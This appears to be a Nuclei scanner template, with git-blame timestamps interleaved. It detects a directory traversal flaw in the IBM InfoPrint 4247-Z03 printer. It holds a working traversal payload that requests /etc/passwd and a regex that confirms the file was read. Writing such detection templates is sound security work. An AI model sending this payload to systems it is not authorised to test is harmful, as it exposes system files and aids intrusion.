2020-09-15 19:25:55 +00:00
|
|
|
id: ibm-infoprint-lfi
|
2020-07-07 12:10:48 +00:00
|
|
|
|
|
|
|
info:
|
|
|
|
name: IBM InfoPrint 4247-Z03 Impact Matrix Printer - Directory Traversal
|
|
|
|
author: Harsh Bothra
|
2020-08-25 19:43:43 +00:00
|
|
|
severity: medium
|
|
|
|
description: Directory traversal vulnerability on IBM InfoPrint 4247-Z03 Impact Matrix Printer.
|
2020-09-20 12:57:43 +00:00
|
|
|
|
2020-08-27 19:05:33 +00:00
|
|
|
# reference: https://www.exploit-db.com/exploits/47835
|
2020-07-07 12:10:48 +00:00
|
|
|
|
|
|
|
requests:
|
|
|
|
- method: GET
|
|
|
|
path:
|
2020-09-17 08:13:19 +00:00
|
|
|
- '{{BaseURL}}/./../../../../../../../../../../etc/passwd'
|
2020-07-07 12:10:48 +00:00
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2020-09-17 08:15:41 +00:00
|
|
|
- type: regex
|
|
|
|
regex:
|
2020-09-17 08:23:00 +00:00
|
|
|
- "root:[x*]:0:0"
|
2020-09-17 08:15:41 +00:00
|
|
|
part: body
|